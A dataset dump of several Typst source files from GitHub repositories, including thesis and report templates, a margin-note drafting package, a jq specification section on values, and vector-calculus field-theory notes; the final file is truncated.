repo
stringlengths 26
115
| file
stringlengths 54
212
| language
stringclasses 2
values | license
stringclasses 16
values | content
stringlengths 19
1.07M
|
---|---|---|---|---|
https://github.com/tilman151/pypst | https://raw.githubusercontent.com/tilman151/pypst/main/docs/examples/table/my-table.typ | typst | MIT License | #figure(
table(
columns: 3,
stroke: none,
align: (x, _) => if calc.odd(x) {left} else {right},
table.hline(y: 1, stroke: 1.5pt),
table.hline(y: 3, stroke: 1.5pt),
table.header[][Name][Age],
[Los Angeles], [1], [30.0],
[New York], [2], [30.0]
),
caption: "This is my table."
) |
https://github.com/yochem/apa-typst | https://raw.githubusercontent.com/yochem/apa-typst/main/examples/single-author-single-affiliation.typ | typst | #import "../template.typ": apa7
#show: apa7.with(
title: "Example of APA7 Document in Typst",
authors: (
"<NAME>",
),
affiliations: (
"Department of Psychology, George Mason University",
),
)
#lorem(40)
|
|
https://github.com/01mf02/jq-lang-spec | https://raw.githubusercontent.com/01mf02/jq-lang-spec/main/values.typ | typst | #import "common.typ": *
= Values <values>
In this section, we will define values, errors, exceptions, and streams.
While jq has originally been limited to operate on JSON values,
we will define the jq semantics for a general value type.
For this value type, there must be a type of numbers and a type of strings, such that
for any number $n$, $n$ is a value, and
for any string $s$, $s$ is a value.
Furthermore, any boolean $top$ (true) or $bot$ (false) must be a value.
By convention, we will write
$v$ for values,
$n$ for numbers, and
$s$ for strings
in the remainder of this text.
Furthermore, the value type must implement a set of operations that will be given in @value-ops.
An _error_ can be constructed from a value by the function $"error"(v)$.
The $"error"$ function is bijective; that is,
if we have an error $e$, then there is a unique value $v$ with $e = "error"(v)$.
In the remainder of this text, we will write just "error"
to denote calling $"error"(v)$ with some value $v$.
This is done such that this specification does not need to fix
the precise error value that is returned when an operation fails.
An _exception_ either is an error or has the shape $"break"(var(x))$.
The latter will become relevant starting from @semantics.
A _value result_ is either a value or an exception.
A _stream_ (or lazy list) is written as $stream(v_0, ..., v_n)$.
The concatenation of two streams $s_1$, $s_2$ is written as $s_1 + s_2$.
Given some stream $l = stream(x_0, ..., x_n)$, we write
$sum_(x in l) f(x)$ to denote $f(x_0) + ... + f(x_n)$.
We use this frequently to map a function over a stream,
by having $f(x)$ return a stream itself.
In this text, we will see many functions that take values as arguments.
By convention, for any of these functions $f(v_1, ..., v_n)$,
we extend their domain to value results such that $f(v_1, ..., v_n)$ yields $v_i$
(or rather $stream(v_i)$ if $f$ returns streams)
if $v_i$ is an exception and for all $j < i$, $v_j$ is a value.
For example, in @arithmetic, we will define $l + r$ for values $l$ and $r$,
and by our convention, we extend the domain of addition to value results such that
if $l$ is an exception, then $l + r$ returns just $l$, and
if $l$ is a value, but $r$ is an exception, then $l + r$ returns just $r$.
== Value operations <value-ops>
In this subsection, we specify the operations that a value type must implement.
There is a total order $<=$ on values.
We say that $v_1 = v_2$ if and only if both $v_1 <= v_2$ and $v_2 <= v_1$.
For JSON values, this order is given in @json-order.
The function $[dot]$ takes a stream of value results
$stream(v_0, ..., v_n)$ and yields a value result.
If there exists an $i$ such that
$v_i$ is an exception and for all $j < i$, $v_j$ is a value, then
$[stream(v_0, ..., v_n)]$ yields the exception $v_i$, otherwise it yields some value.
For JSON values, $[f]$ constructs an array if all elements of $f$ are values,
see @json-construction.
#example[
Suppose that 1, 2, and 3 are values.
Then $[1, "error"(2), "error"(3)] = "error"(2)$.
]
The function ${dot:dot}$ takes a pair of values and yields a value result.
Furthermore, the constant ${}$ yields a value result.
For JSON values, ${s: v}$ constructs a singleton object and ${}$ constructs an empty object,
see @json-construction.
The function $"bool"(v)$ takes a value $v$ and yields a boolean.
If $v in {top, bot}$, then $"bool"(v) = v$.
Let $p$ a path part (as defined in @syntax) containing values as indices.
The _access operator_ $v[p]$ extracts values contained within $v$ at positions given by $p$,
yielding a stream of value results.
The _update operator_ $v[p]^? update f$ replaces those elements $v' = v[p]$ in $v$ by
the output of $f(v')$, where $f$ is a function from a value to a stream of value results.
The update operator yields a single value result.
If $v[p]$ returns an error, then
$v[p] update f$ should yield an error and
$v[p]? update f$ should yield $v$.
We define $v[p]? = sum_(y in v[p]) cases(
stream( ) & "if" y = "error"(e),
stream(y) & "otherwise",
)$.
The access operator will be used in @semantics, and
the update operator will be used in @updates.
For JSON values,
the access operator is defined in @json-access and
the update operator is defined in @json-update.
|
|
https://github.com/TypstApp-team/typst | https://raw.githubusercontent.com/TypstApp-team/typst/master/tests/typ/layout/pagebreak-parity.typ | typst | Apache License 2.0 | // Test clearing to even or odd pages.
---
#set page(width: 80pt, height: 30pt)
First
#pagebreak(to: "odd")
Third
#pagebreak(to: "even")
Fourth
#pagebreak(to: "even")
Sixth
#pagebreak()
Seventh
#pagebreak(to: "odd")
#page[Ninth]
---
#set page(width: auto, height: auto)
// Test with auto-sized page.
First
#pagebreak(to: "odd")
Third
---
#set page(height: 30pt, width: 80pt)
// Test when content extends to more than one page
First
Second
#pagebreak(to: "odd")
Third
|
https://github.com/icpmoles/politypst | https://raw.githubusercontent.com/icpmoles/politypst/main/aside/acknowledgements.typ | typst | #let acknowledgements = [
#heading(numbering: none)[Acknowledgements]
Here you might want to acknowledge someone.
Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
] |
|
https://github.com/DashieTM/ost-5semester | https://raw.githubusercontent.com/DashieTM/ost-5semester/main/cyberdef/weeks/week1.typ | typst | #import "../../utils.typ": *
|
|
https://github.com/Treeniks/bachelor-thesis-isabelle-vscode | https://raw.githubusercontent.com/Treeniks/bachelor-thesis-isabelle-vscode/master/template.typ | typst | #let thesis(
title-primary: [],
title-secondary: [],
degree: "",
program: "",
supervisor: "",
advisors: (),
author: "",
start-date: datetime,
submission-date: datetime,
acknowledgements: [],
abstract: [],
appendix: none,
doc,
) = {
set document(title: title-primary, author: author, date: submission-date)
// default
show par: set block(spacing: 1.2em)
show heading: set block(below: 1.6em, above: 2.4em)
// Reference first-level headings as "chapters"
show heading.where(level: 1): set heading(supplement: [Chapter])
show heading.where(level: 1): set text(size: 1.4em)
show heading.where(level: 2): set text(size: 1.2em)
show heading.where(level: 3): set text(size: 1.1em)
show heading.where(level: 4): set text(size: 1.05em)
// Put chapters on new page and add extra spacing
show heading.where(level: 1): it => {
// reset footnote counter
pagebreak(weak: true)
counter(footnote).update(0)
v(3em)
it
}
show figure.caption: set text(size: 0.85em)
show figure.caption: set par(justify: false)
set list(indent: 1em)
set enum(indent: 1em)
show cite.where(form: "prose"): set cite(style: "/association-for-computing-machinery-prose.csl")
set page(margin: (left: 30mm, right: 30mm, top: 40mm, bottom: 40mm))
let cit = upper(text(size: 24pt, [School of Computation,\ Information and Technology\ -- Informatics --]))
let tum = upper(text(size: 14pt, [Technical University of Munich]))
let degree-program = text(size: 16pt, degree + "'s Thesis in " + program)
let title1 = text(weight: "bold", size: 20pt, title-primary)
let title2 = text(weight: "regular", size: 20pt, title-secondary)
// ===== Cover =====
{
set align(center)
image("/resources/tum-logo.svg", width: 30%)
cit
v(0mm)
tum
v(10mm)
degree-program
v(10mm)
title1
v(10mm)
text(size: 16pt, author)
pagebreak(weak: true)
}
// ===== Cover =====
// ===== Title Page =====
{
set align(center)
image("/resources/tum-logo.svg", width: 30%)
cit
v(0mm)
tum
v(10mm)
degree-program
v(10mm)
title1
v(0mm)
title2
v(1fr)
let entries = ()
entries.push(("Author: ", author))
entries.push(("Supervisor: ", supervisor))
if advisors.len() > 0 {
entries.push(("Advisors: ", advisors.join(", ")))
}
entries.push(("Start Date: ", start-date.display("[day].[month].[year]")))
entries.push(("Submission Date: ", submission-date.display("[day].[month].[year]")))
set text(size: 11pt)
grid(
columns: 2,
gutter: 0.6em,
align: (left, left),
..for (term, desc) in entries {
(strong(term), desc)
}
)
pagebreak(weak: true)
}
// ===== Title Page =====
set par(justify: true)
// ===== Disclaimer =====
{
v(1fr)
text("I confirm that this " + lower(degree) + "'s thesis is my own work and I have documented all sources and material used.")
v(3em)
grid(
columns: 2,
gutter: 1fr,
"Munich, " + submission-date.display("[day].[month].[year]"), author,
)
pagebreak(weak: true)
}
// ===== Disclaimer =====
set page(numbering: "i")
set page(margin: (left: 50mm, right: 50mm, top: 40mm, bottom: 60mm))
// ===== Acknowledgement =====
{
show heading: set align(center)
heading("Acknowledgements")
acknowledgements
pagebreak(weak: true)
// ===== Acknowledgement =====
// ===== Abstract =====
heading("Abstract")
abstract
pagebreak(weak: true)
}
// ===== Abstract =====
set page(margin: (left: 30mm, right: 30mm, top: 30mm, bottom: 60mm))
// ===== TOC =====
{
show outline.entry.where(level: 1): it => {
v(2em, weak: true)
link(
it.element.location(),
strong({
it.body
h(1fr)
it.page
}),
)
}
outline(
title: {
text(size: 1.4em, weight: "bold", "Contents")
v(2em)
},
depth: 4,
indent: auto,
)
pagebreak(weak: true)
}
// ===== TOC =====
set heading(numbering: "1.1")
set page(numbering: "1")
counter(page).update(1)
doc
outline(
title: "List of Figures",
target: figure.where(kind: image),
)
outline(
title: "List of Tables",
target: figure.where(kind: table),
)
outline(
title: "List of Listings",
target: figure.where(kind: raw),
)
bibliography("/biblio.bib", style: "association-for-computing-machinery")
// Appendix
if appendix != none {
pagebreak(weak: true)
set heading(numbering: none)
heading(numbering: none)[Appendix]
appendix
}
}
|
|
https://github.com/typst/packages | https://raw.githubusercontent.com/typst/packages/main/packages/preview/drafting/0.1.0/drafting.typ | typst | Apache License 2.0 | #let pos-tracker = state("pos", none)
#let margin-note-defaults = state(
"margin-note-defaults", (margin-right: 0in, margin-left: 0in, stroke: red, side: right, page-width: none, text-kwargs: none)
)
#let absolute-place(dx: 0em, dy: 0em, content) = {
locate(loc => {
let pos = loc.position()
if pos-tracker.at(loc) != none {
pos = pos-tracker.at(loc)
} else {
pos = loc.position()
pos-tracker.update(pos)
}
place(dx: -pos.x + dx, dy: -pos.y + dy, content)
})
pos-tracker.update(none)
}
#let _calc-text-resize-ratio(width, spacing, styles) = {
// Add extra digit to ensure reasonable separation between two adjacent lines
let num-digits = calc.ceil(calc.log(width)) + 1
// M is conventionally the widest character so it should leave enough space if determining
// the scale factor
let dummy-number = "M"
for ii in range(1, num-digits) {
dummy-number += "M"
}
let max-width = measure(text(dummy-number), styles).width
spacing/max-width * 100%
}
#let rule-grid(
color: black,
width: 100cm,
height: 100cm,
spacing: none,
divisions: none,
relative: true,
) = {
// Unfortunately an int cannot be constructed from a length, so get it through a
// hacky method of converting to a string then an int
if spacing == none and divisions == none {
panic("Either `spacing` or `divisions` must be specified")
}
if spacing != none and divisions != none {
panic("Only one of `spacing` or `divisions` can be specified")
}
if divisions != none {
spacing = calc.min(width, height)/divisions
}
let to-int(amt) = int(float(repr(amt.abs).slice(0, -2)))
let x-spacing = spacing
let y-spacing = spacing
if type(spacing) == "sequence" {
x-spacing = spacing.at(0)
y-spacing = spacing.at(1)
}
let width = to-int(width)
let height = to-int(height)
set text(size: spacing, fill: color)
set line(stroke: color)
let place-func = if relative {place} else {absolute-place}
style(styles => {
// text should fit within a spacing rectangle. For now assume it's good enough
// to just check against x dimension
let scale-factor = _calc-text-resize-ratio(width, spacing, styles)
let scaler = scale.with(x: scale-factor, y: scale-factor, origin: top + left)
locate(loc => {
let step = to-int(x-spacing)
for (ii, dx) in range(0, width, step: step).enumerate() {
place-func(
line(start: (dx * 1pt, 0pt), end: (dx * 1pt, height * 1pt))
)
place-func(
dx: dx * 1pt, dy: 1pt,
scaler(repr(ii * step))
)
}
let step = to-int(y-spacing)
for (ii, dy) in range(0, height, step: step).enumerate() {
place-func(line(start: (0pt, dy * 1pt), end: (width * 1pt, dy * 1pt)))
place-func(
dy: dy * 1pt + 1pt, dx: 0pt,
scaler(repr(ii * step))
)
}
})
})
}
#let set-margin-note-defaults(..defaults) = {
margin-note-defaults.update(old => {
for (key, value) in defaults.named().pairs() {
old.insert(key, value)
}
old
})
}
#let set-page-properties(margin-right: 0pt, margin-left: 0pt, ..kwargs) = {
let kwargs = kwargs.named()
// Wrapping in "place" prevents a linebreak from adjusting
// the content
place(
layout(layout-size => {
let update-dict = (
margin-right: margin-right, margin-left: margin-left, page-width: layout-size.width,
)
for (kw, val) in kwargs.pairs() {
update-dict.insert(kw, val)
}
set-margin-note-defaults(..update-dict)
})
)
}
#let margin-lines(stroke: gray + 0.5pt) = {
locate(loc => {
let r-margin = margin-note-defaults.at(loc).margin-right
let l-margin = margin-note-defaults.at(loc).margin-left
place(dx: -2%, rect(height: 100%, width: 104%, stroke: (left: stroke, right: stroke)))
// absolute-place(dx: 100% - l-margin, line(end: (0%, 100%)))
})
}
#let _path-from-diffs(start: (0pt, 0pt), ..diffs) = {
let diffs = diffs.pos()
let out-path = (start, )
let next-pt = start
for diff in diffs {
next-pt = (next-pt.at(0) + diff.at(0), next-pt.at(1) + diff.at(1))
out-path.push(next-pt)
}
out-path
}
#let get-page-pct(loc) = {
let page-width = margin-note-defaults.at(loc).page-width
if page-width == none {
panic("drafting's default `page-width` must be specified and non-zero before creating a note")
}
page-width/100
}
#let _margin-note-right(body, stroke, dy, anchor-x, width, loc) = {
let pct = get-page-pct(loc)
let left-margin = margin-note-defaults.at(loc).margin-left
let dist-to-margin = 101*pct - anchor-x + left-margin
let text-offset = 0.5em
let path-pts = _path-from-diffs(
// make an upward line before coming back down to go all the way to
// the top of the lettering
(0pt, -1em),
(0pt, 1em + text-offset),
(dist-to-margin, 0pt),
(0pt, dy),
(1*pct, 0pt)
)
// Boxing prevents forced paragraph breaks
box[
#place(path(stroke: stroke, ..path-pts))
#place(dx: dist-to-margin + 1*pct, dy: dy + text-offset, rect(stroke: stroke, body, width: width - 4*pct))
]
}
#let _margin-note-left(body, stroke, dy, anchor-x, width, loc) = {
let pct = get-page-pct(loc)
let dist-to-margin = -anchor-x + 1*pct
let text-offset = 0.4em
let box-width = width - 4*pct
let path-pts = _path-from-diffs(
(0pt, -1em),
(0pt, 1em + text-offset),
(-anchor-x + width + 1*pct, 0pt),
(-2*pct, 0pt),
(0pt, dy),
(-1*pct, 0pt),
)
// Boxing prevents forced paragraph breaks
box[
#place(path(stroke: stroke, ..path-pts))
#place(dx: dist-to-margin + 1*pct, dy: dy + text-offset, rect(stroke: stroke, body, width: box-width))
]
}
#let margin-note(body, dy: 0pt, ..kwargs) = {
locate(loc => {
let anchor-x = loc.position().x
let properties = margin-note-defaults.at(loc)
for (kw, val) in kwargs.named().pairs() {
properties.insert(kw, val)
}
set text(..properties.text-kwargs) if properties.text-kwargs != none
if properties.side == right {
_margin-note-right(body, properties.stroke, dy, anchor-x, properties.margin-right, loc)
} else {
_margin-note-left(body, properties.stroke, dy, anchor-x, properties.margin-left, loc)
}
})
}
|
https://github.com/maucejo/cnam_templates | https://raw.githubusercontent.com/maucejo/cnam_templates/main/src/report/_report-utils.typ | typst | MIT License | #import "../common/_colors.typ": *
#import "../common/_utils.typ": *
#let title-page(config-titre) = {
let logo-height = 4.08cm
let decx = 1.5cm
let decy = -1.45cm
if config-titre.composante != "cnam" {
logo-height = 10cm
decx = 1.5cm
decy = -2cm
}
let box-width = 125%
let box-height = 115%
if config-titre.alignement == "center" {
box-width = 107%
box-height = 95%
decx = 0.8cm
}
let tbox = box(fill: primary.light-blue.lighten(60%), width: box-width, height: box-height)[
#set text(font: "Raleway", fill: primary.dark-blue)
#config-titre.titre
]
place(dx: -0.5cm, tbox)
grid(
columns: (1fr, 1fr),
align: (left, right),
[#place(top+left, dx: -0.85cm, dy: -1.45cm, over-title(title: config-titre.surtitre, size: 20pt, color: primary.dark-blue))], [#place(right, dx: decx, dy: decy, image("../resources/logo/" + config-titre.composante + ".png", width: logo-height))]
)
if config-titre.alignement == "center" {
if config-titre.logo != none {
set image(height: 1.75cm)
if type(config-titre.logo) == content {
place(bottom + right, dy: 1.5cm, config-titre.logo)
} else {
let im-grid = {
grid(
columns: config-titre.logo.len(),
column-gutter: 1cm,
align: right+ horizon,
..config-titre.logo.map((logos) => logos)
)
}
place(bottom + right, dy: 1.5cm, im-grid)
}
}
}
pagebreak()
}
#let create_dict(default-dict, user-dict) = {
let new-dict = default-dict
for (key, value) in user-dict {
if key in default-dict.keys() {
new-dict.insert(key, value)
}
}
return new-dict
} |
https://github.com/SnowManKeepsOnForgeting/NoteofFluidMechanics_WuWangyi | https://raw.githubusercontent.com/SnowManKeepsOnForgeting/NoteofFluidMechanics_WuWangyi/main/Chapter_1.typ | typst | Creative Commons Zero v1.0 Universal | #import "@preview/physica:0.9.3": *
#import "@preview/i-figured:0.2.4"
#set heading(numbering: "1.1")
#show math.equation: i-figured.show-equation.with(level: 2)
#show heading: i-figured.reset-counters.with(level: 2)
= Field Theory
== Definition
First,let us define scalar field $phi$ as $phi = phi(bold(r),t)=phi(x,y,z,t)$ and vector field $bold(a)$ as $bold(a) = bold(a)(bold(r),t) = bold(a)(x,y,z,t)$.
Then $op("grad") phi $ of scalar $phi$ would be
$
op("grad") phi = pdv(phi,x)bold(i) + pdv(phi,y)bold(j) + pdv(phi,z)bold(k)
$
Given a vector field $bold(a)$,choose any point in the field and wrap it in volume $V$.We define divergence of the field as:
$
op("div")bold(a) = lim_(V->0) (integral.cont_S bold(a) dot dd(bold(S)))/V
$
By Остроградский-Gauss formula,We can deduce:
$
op("div") bold(a) = pdv(a_x,x) + pdv(a_y,y) + pdv(a_z,z)
$
We define projection along a direction $bold(n)$ of curl of the vector field as:
$
op("rot")_n bold(a) = lim_(S->0)(integral.cont_L bold(a) dot dd(bold(r)))/S
$
where we choose any point in the field and choose a infinitly small closed curve $L$ on the curved surfuce $S$ and direction of normal line of the curved surfuce is as same as $bold(n)$.
By Stoke formula,we can de deduce:
$
op("rot") bold(a) = mat(delim: "|",
bold(i),bold(j),bold(k);
pdv(,x),pdv(,y),pdv(,z);
a_x,a_y,a_z
)
$
We define Hamiltonian as:
$
nabla = bold(i)pdv(,x) + bold(j)pdv(,y) + bold(k)pdv(,z)
$
and read it as nabla.
We define Laplace Operator as:
$
laplace = pdv(,x,2) + pdv(,y,2) + pdv(,z,2)
$
== Basic formula
Let us deduce basic formula!
(1) Derivation formula
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"grad"(phi + psi) = "grad"phi + "grad"psi
$
*Proof*:It is as same as derivation.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"grad"(phi psi) = psi"grad"phi + phi"grad"psi
$
*Proof*:It is as same as derivation.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"grad"F(phi) = F'(phi)"grad"phi
$
*Proof*:It is as same as derivation.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"div"bold((a+b)) = "div"bold(a) + "div"bold(b)
$
*Proof*:It is as same as derivation.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt,
)[
$
"div"(phi bold(a)) = phi"div"bold(a) + bold(a)dot"grad"phi
$
*Proof*:
$
"div"(phi bold(a)) = pdv(phi a_x,x) + pdv(phi a_y,y) + pdv(phi a_y,y) = phi"div"bold(a) + bold(a)dot "grad"phi
$<->
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"div"(bold(a) times bold(b)) = bold(b)dot "rot"bold(a) - bold(a)dot "rot"bold(b)
$
*Proof*:
$
"div"(bold(a) times bold(b)) &= "div"((a_y b_z - b_y a_z) bold(i) + (a_z b_x - a_x b_z)bold(j) + (b_y a_x - a_y b_x)bold(k))\
&= (a_y pdv(b_z,x) + b_z pdv(a_y,x) - b_y pdv(a_z,x) - a_z pdv(b_y,x))\
&+ (a_z pdv(b_x,y) + b_x pdv(a_z,y) - a_x pdv(b_z,y) - b_z pdv(a_x,y))\
&+ (b_y pdv(a_x,z) + a_x pdv(b_y,z) - a_y pdv(b_x,z) - b_x pdv(a_y,z))\
&= bold(b) dot "rot"bold(a) - bold(a) dot "rot"bold(b)
$<->
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"rot"(bold(a)+bold(b)) = "rot"bold(a) + "rot"bold(b)
$
*Proof*:It is eazy to prove.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"rot"(phi bold(a)) = phi"rot"bold(a) + "grad"phi times"rot"bold(a)
$
*Proof*:Expand it and prove it.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"rot"(bold(a) times bold(b)) = (bold(b) dot nabla)bold(a) -(bold(a) dot nabla)bold(b) + bold(a)"div"bold(b) - bold(b)"div"bold(a)
$
*Proof*:We refer $bold(a)_c,phi_c$ as a constant vector and a constant value which means we dont derivate it.
$
"Then" "rot"(bold(a) times bold(b)) &= nabla times (bold(a) times bold(b)) = nabla times (bold(a)_c times bold(b)) + nabla times (bold(a) times bold(b)_c)\
&= bold(a)_c (nabla dot bold(b)) - (bold(a)_c dot nabla)bold(b) + (bold(b)_c dot nabla)bold(a) - bold(b)_c (nabla dot bold(a))\
&=(bold(b) dot nabla)bold(a) - (bold(a)dot nabla)bold(b) + bold(a)"div"bold(b) - bold(b)"div"bold(a)
$<->
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"grad"(bold(a) dot bold(b)) = (bold(b)dot nabla)bold(a) + (bold(a) dot nabla)bold(b) + bold(b)times "rot"bold(a) + bold(a) times "rot"bold(b)
$<eq18>
*Proof*:
$
"grad"(bold(a) dot bold(b)) &= nabla(bold(a) dot bold(b)) = nabla (bold(a)_c dot bold(b)) + nabla (bold(a) dot bold(b)_c) \
&= bold(a)_c times (nabla times bold(b)) + (bold(a)_c dot nabla)bold(b) + bold(b)_c times (nabla times bold(a)) + (bold(b)_c dot nabla)bold(a)\
&= (bold(b)dot nabla)bold(a) + (bold(a) dot nabla)bold(b) + bold(b)times "rot"bold(a) + bold(a) times "rot"bold(b)
$<->
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"grad"((a^2)/2) = (bold(a) dot nabla)bold(a) + bold(a) times "rot"bold(a)
$
*Proof*:Substitute $bold(a)$ for $bold(b)$ in @eqt:eq18
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"div" "grad"phi = laplace phi
$
*Proof*:
$
"div" "grad"phi = nabla dot nabla phi = nabla^2 phi = laplace phi
$<->
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"div" "rot"bold(a) = 0
$
*Proof*:
$
"div" "rot"bold(a) = nabla dot (nabla times bold(a)) = (nabla times nabla)dot bold(a) = 0
$<->
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"rot" "grad"phi = 0
$
*Proof*:
$
"rot" "grad"phi = nabla times nabla phi = 0
$<->
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"rot" "rot"bold(a) = "grad" "div"bold(a) - laplace bold(a)
$
*Proof*:
$
"rot" "rot"bold(a) = nabla times (nabla times bold(a)) = nabla(nabla dot bold(a)) - (nabla dot nabla) bold(a) = "grad" "div"bold(a) - laplace bold(a)
$<->
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"div"(phi "grad"psi) = phi laplace psi + "grad"phi dot "grad"psi
$
*Proof*:
$
"div"(phi "grad"psi) = nabla dot (phi nabla psi) = nabla dot (phi_c nabla psi) + nabla dot (phi nabla psi_c) = phi laplace psi + "grad"phi "grad"psi
$<->
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
laplace(phi psi) = psi laplace phi + phi laplace psi + 2"grad"phi dot "grad"psi
$
*Proof*:
$
laplace(phi psi) = nabla dot nabla(phi psi) = nabla dot (phi nabla psi + psi nabla phi) = psi laplace phi + phi laplace psi + 2"grad"phi dot "grad"psi
$<->
]
(2) Integral formula
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
integral_V"grad"phi dd(V) = integral_S bold(n)phi dd(S)
$
*Proof*:I have not prove yet.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[Остроградский-Gauss formula
$
integral_V "div"bold(a)dd(V) = integral_S bold(n)dot bold(a)dd(S)
$
*Proof*:I have not prove yet.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
integral_V "rot"bold(a)dd(V) = integral_S bold(n)times bold(a)dd(S)
$
*Proof*:I have not prove yet.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
integral_V (bold(v)dot nabla)bold(a)dd(V) = integral_S (bold(v) dot bold(n) )bold(a) dd(S)
$
$bold(v)$ is a constant vector.
*Proof*:I have not prove yet.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
integral_V laplace phi dd(V) = integral_S pdv(phi,n)dd(S) = integral_S bold(n)dot nabla phi dd(S)
$
*Proof*:I have not prove yet.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
integral_V laplace bold(a) dd(V) = integral_S pdv(bold(a),n)dd(S) = integral_S (bold(n)dot nabla) bold(a) dd(S)
$
*Proof*:I have not prove yet.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
First Green formula
$
integral_V (phi laplace psi + "grad"phi dot "grad"psi)dd(V) = integral_S phi pdv(psi,n)dd(S)
$
and $V$ is a simply connected domain.
*Proof*:I have not prove yet.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
Second Green formula.
$
integral_V (phi laplace psi - psi laplace phi) dd(V) = integral_S (phi pdv(psi,n) - psi pdv(phi,n))dd(S)
$
and $V$ is a simply connected domain.
*Proof*:I have not prove yet.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
integral_V ("grad"phi)^2 dd(V) = integral_S phi pdv(phi,n)dd(S)
$
and $laplace phi = 0$,$V$ is a simply connected domain.
*Proof*:I have not prove yet.
]
|
https://github.com/TideDra/seu-thesis-typst | https://raw.githubusercontent.com/TideDra/seu-thesis-typst/main/template.typ | typst | #import "constants.typ": 字体, 字号, 行距
#import "utils.typ": set_doc, set_doc_footnote, part_state
#import "@preview/cuti:0.2.0": show-cn-fakebold
// 论文翻译封面
#let translation_cover(
raw_paper_name: none,
translated_paper_name: none,
student_id: none,
name: none,
college: none,
major: none,
supervisor: none,
date: datetime.today().display("[year].[month].[day]"),
) = {
set page(paper: "a4")
set text(font: 字体.宋体, lang: "zh", region: "cn")
align(center)[
#image("figures/logo.png", width: 45%)
#v(-1em)
#text(size: 26pt, font: 字体.黑体)[*本科毕业设计(论文)资料翻译*]
]
v(24pt)
align(right)[
#block(width: 90%, height: 8cm)[
#set align(left)
#set par(leading: 2em)
#text(size: 16pt)[翻译资料名称(外文)\ #raw_paper_name]\
#text(size: 16pt)[翻译资料名称(中文)\ #translated_paper_name]
]
]
align(center)[
#set par(leading: 18pt)
#let info_row(
key,
value,
) = [#key:#h(2.5em)#box(width: 58%, stroke: (bottom: black), outset: 4pt)[#align(center)[#value]]]
#set text(size: 18pt)
#block(width: 80%)[
#info_row([学#h(2em)号], [#student_id])\
#info_row([姓#h(2em)名], [#name])\
#info_row([学#h(2em)院], [#college])\
#info_row([专#h(2em)业], [#major])\
#info_row([指导教师], [#supervisor])\
#info_row([完成日期], [#date])
]
]
}
// 本科毕设封面
#let bachelor_cover(
title: none,
student_id: none,
name: none,
college: none,
major: none,
supervisor: none,
duration: none,
) = {
set page(paper: "a4", margin: (right: 2.4cm, left: 2.4cm, top: 2cm, bottom: 2cm))
show: show-cn-fakebold
set align(center)
v(1.2cm)
image("figures/logo.png", width: 10cm)
v(-0.53cm)
text(font: 字体.黑体, size: 字号.一号, weight: "bold")[本科毕业设计(论文)报告]
v(2.07cm)
let title_array() = {
if type(title)!=array {return (title,)}
else {return title}
}
set text(font: 字体.黑体, size: 22pt)
let underline_entire_line(doc) = {
box(width:100%,stroke: (bottom: 0.5pt), outset: (bottom: 6pt, x: 8pt),underline(stroke: 0.5pt,offset: 6pt,extent:8pt)[#doc])
}
grid(
columns: (2.2cm, 1fr),
gutter: 18pt,
[题#h(0.5em)目: ],
par(leading: 30pt,title_array().map(underline_entire_line).join())
)
v(1.8cm)
set par(justify: true)
set text(font: 字体.宋体, size: 18pt)
grid(
columns: (1.4cm, 5em, 1fr, 1.8cm),
column-gutter: 12pt,
row-gutter: 1.5em,
[],
[学#h(2em)号:],
[#box(stroke: (bottom: 0.5pt), outset: 6pt, width: 100%, student_id)],
[],
[],
[姓#h(2em)名:],
[#box(stroke: (bottom: 0.5pt), outset: 6pt, width: 100%, name)],
[],
[],
[学#h(2em)院:],
[#box(stroke: (bottom: 0.5pt), outset: 6pt, width: 100%, college)],
[],
[],
[专#h(2em)业:],
[#box(stroke: (bottom: 0.5pt), outset: 6pt, width: 100%, major)],
[],
[],
[指导教师:],
[#box(stroke: (bottom: 0.5pt), outset: 6pt, width: 100%, supervisor)],
[],
[],
[起止日期:],
[#box(stroke: (bottom: 0.5pt), outset: 6pt, width: 100%, duration)],
[],
)
}
// 论文声明页
#let claim_page(year:none,month:none,day:none) = {
let year = {set align(center);year}
let month = {set align(center);month}
let day = {set align(center);day}
set page(paper: "a4", margin: (x: 2.3cm, top: 2cm, bottom: 2cm))
set align(center)
v(1.7cm)
text(font: 字体.黑体, size: 18pt)[东南大学毕业(设计)论文独创性声明]
v(0.8cm)
set align(left)
set par(first-line-indent: 2em, justify: true, leading: 11.83pt)
set text(font: 字体.宋体, size: 12pt)
